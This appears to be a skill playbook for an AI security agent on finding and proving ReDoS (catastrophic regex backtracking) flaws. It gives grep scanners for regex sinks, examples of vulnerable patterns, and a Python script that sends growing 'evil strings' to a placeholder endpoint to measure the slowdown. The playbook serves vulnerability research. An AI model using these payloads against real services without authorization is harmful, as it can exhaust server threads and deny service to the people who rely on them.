name: redos description: "Hunt ReDoS (CWE-1333, Catastrophic Backtracking) — identify regexes with nested quantifiers or overlapping alternation that cause super-linear matching time, trace tainted input paths to regex sinks, demonstrate timing PoC, and validate with response-time delta. Covers PCRE/RE2/V8/Python re engine differences. Triggers on: 'ReDoS', 'regex denial', 'catastrophic backtracking', 'redos', 'regex complexity', 'nested quantifiers', 'regex amplification', 'CWE-1333'." allowed-tools: Bash Read Write metadata: subdomain: web-exploitation when_to_use: "redos regex denial catastrophic backtracking regex complexity nested quantifiers regex amplification cwe-1333 pcre re2 v8" tags: redos, regex, dos, backtracking, cwe-1333, denial-of-service mitre_attack: T1499.004
ReDoS Hunting Playbook
Regular Expression Denial of Service exploits O(2^n) or O(n^2) matching time in backtracking engines. One crafted string can peg a CPU thread for seconds or minutes against an otherwise tiny pattern.
1. Identify Backtracking Engines in Scope
Not all regex engines backtrack:
| Engine | Language/Runtime | Backtracks? | Vulnerable? |
|---|---|---|---|
| PCRE / PCRE2 | C, PHP, Apache, nginx | Yes | YES |
re module |
Python (pre-3.11 re, regex) |
Yes | YES |
java.util.regex |
Java | Yes | YES |
RegExp |
JavaScript / V8 | Yes | YES |
System.Text.RegularExpressions |
.NET | Yes (w/ timeout option) | YES |
regexp package |
Go | DFA-based (RE2) | NO |
Oniguruma |
Ruby | Yes | YES |
| RE2 | C++, re2 Python binding | DFA-based | NO |
If the target uses RE2 or Go's regexp, skip this playbook — no
backtracking, no ReDoS.
2. Source Patterns — Where Tainted Input Reaches Regex
# Python
grep -rn 're\.match\|re\.search\|re\.fullmatch\|re\.compile\|regex\.match' /workspace/src \
| grep -v '#' | grep -v 'test_' | grep -v '_test\.py'
# Node.js / TypeScript
grep -rn 'new RegExp\|\.match(\|\.search(\|\.test(' /workspace/src \
--include='*.js' --include='*.ts' | grep -v 'node_modules'
# Java
grep -rn 'Pattern\.compile\|\.matches(\|\.find(\|String\.matches' /workspace/src \
--include='*.java'
# PHP
grep -rn 'preg_match\|preg_replace\|preg_split' /workspace/src --include='*.php'
# Ruby
grep -rn 'match\|=~\|Regexp\.new\|\.scan(' /workspace/src --include='*.rb' \
| grep -v '#'
# Semgrep for tainted-input-to-regex-sink
semgrep --config p/regex /workspace/src --sarif -o /workspace/sem-redos.sarif 2>/dev/null
For each hit, determine whether the regex pattern is:
- Static (hardcoded string literal) → scan the pattern itself
- Dynamic (constructed from user input) → separate vuln class (regex injection); flag it and continue
3. Catastrophic Pattern Recognition
A regex is potentially catastrophic if it can match the same character through multiple paths. The two canonical forms:
Form 1: Nested quantifiers
(a+)+, (a*)*, ([a-z]+)+, (a|a)+
The inner group can match one character in multiple ways → exponential
backtracking on a string like aaaa...b.
Form 2: Overlapping alternation
(a|aa)+, (a|ab)+c, (x+|y+)+z
Two branches can match the same prefix → exponential when neither eventually matches the suffix.
Quick pattern scanner
# Find potentially catastrophic regexes (grep heuristic)
grep -rn "$(printf \
'(\([^)]*[+*][^)]*\)[+*])\|(\([^)]*|\[^)]*\)[+*])\|(\([^)]*[+*]\)\{[2-9]\})')" \
/workspace/src 2>/dev/null | grep -v 'node_modules\|\.min\.js'
# Better: use vuln-regex-detector (if available)
python3 -c "
import subprocess, json, os, sys
# Try to find all regex literals in Python files
import ast, glob
for path in glob.glob('/workspace/src/**/*.py', recursive=True):
try:
tree = ast.parse(open(path).read())
for node in ast.walk(tree):
if isinstance(node, ast.Call):
fn = getattr(node.func, 'attr', '') or getattr(node.func, 'id', '')
if fn in ('compile','match','search','fullmatch'):
for arg in node.args:
if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
print(path, node.lineno, repr(arg.value))
except Exception:
pass
" 2>/dev/null | head -50
Patterns warranting deeper analysis (flag these):
- Any group with a quantifier inside a quantifier:
(X+)+,(X*)+,(X+)* - Alternation where branches share a prefix:
(ab|a)+,(abc|ab)+ - Long character classes under a star inside a group under a star:
([a-z ]+)+
4. Taint Heuristics — Is This Reachable?
For each flagged regex, trace whether attacker-controlled data reaches the
pattern, the string argument, or both:
stringtainted,patternstatic → ReDoS possible if pattern is vulnerablepatterntainted → also check for Regex Injection (attacker adds their own quantifiers → instant ReDoS)- Both tainted → highest risk
For web endpoints, check:
- URL path / query param → regex for routing or validation
- HTTP body field → input validation regex
- Header (User-Agent, Content-Type) → server-side validation
5. Timing PoC Construction
A valid PoC must demonstrate measurable time difference between a benign and a malicious input against the same endpoint.
Evil string generation
For a vulnerable pattern (a+)+$ on a string of length n:
- Malicious:
"a" * n + "b"(forces full backtracking on the trailingb) - Benign:
"a" * n(matches instantly)
General evil-string construction:
- Identify the "pump" character (what the repeating group matches)
- Append a character that breaks the match at the end
- Scale the pump length until response time > 3× normal
import time, requests
TARGET = "https://<TARGET>/api/validate"
PUMP = "a"
FAIL = "!"
for n in [10, 100, 500, 1000, 5000, 10000]:
evil = PUMP * n + FAIL
benign = PUMP * n
t0 = time.time(); requests.post(TARGET, json={"input": benign}, timeout=30); t_benign = time.time()-t0
t0 = time.time(); requests.post(TARGET, json={"input": evil}, timeout=30); t_evil = time.time()-t0
print(f"n={n}: benign={t_benign:.3f}s evil={t_evil:.3f}s ratio={t_evil/max(t_benign,0.001):.1f}x")
if t_evil > 3.0:
print(">> CONFIRMED REDOS — halting to avoid DoS")
break
6. Validate Finding Contract
Use validate_finding with:
success_patterns:
- "<time_evil> > 2.0" # or match pattern in response body if timed-out
- "Response time delta > 2s"
negative_command: same request with a short benign input (n=5)
negative_patterns: ["< 0.1s", "< 0.5s"]
Minimum bar for a valid ReDoS finding:
- Malicious input takes ≥ 3× longer than benign input of similar length
- Time scales super-linearly with input length (not just 3× at n=100)
- The pattern is reachable without authentication, OR the impact is amplified by concurrent requests (even authenticated paths can be DoS)
7. Engine-Specific Notes
JavaScript (V8)
V8 added backtrack-limit mitigations in Node 16+ and Chrome 93+
(RegExp.prototype.exec timeout, but controllable via --max-old-space-size).
Still exploitable with long inputs or on older Node versions.
Python re
No backtrack limit by default. re.fullmatch on complex patterns blocks
the event loop in async frameworks (FastAPI, aiohttp) — single thread DoS.
Test with: python3 -c "import re,time; t=time.time(); re.match(r'(a+)+$','a'*25+'b'); print(time.time()-t,'s')".
Java java.util.regex
Thread-blocking. Servlet containers / Spring endpoints that call
Pattern.matches(taintedOrBadPattern, input) without timeout will pin a
thread. Test with StopWatch timing.
PHP preg_match
Has pcre.backtrack_limit (default 1000000) and pcre.recursion_limit
(default 100000). Hitting limits returns false (not an error by default),
but causes CPU spike before the limit kicks in.
8. Default CVSS
| Scenario | CVSS | Score |
|---|---|---|
| Unauthenticated endpoint, n=10K → 10s+ | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 7.5 |
| Authenticated, single user DoS | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H | 6.5 |
| Async framework (entire event loop blocked) | AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H | 8.6 |
9. Chain Promotion
ReDoS alone is a DoS primitive. Promote via:
enablesedge to availability impact node- If the endpoint is in a critical auth or payment path → escalate severity
- If the regex also leaks match groups (regex injection) → dual vuln class
kg_add_node("vulnerability", "ReDoS in /api/validate::input",
props={"pattern": "(a+)+$", "file": "api/validators.py", "line": 42,
"cwe": "CWE-1333", "evil_input_len": 10000, "evil_time_s": 12.3,
"key": "redos:api-validate-input"})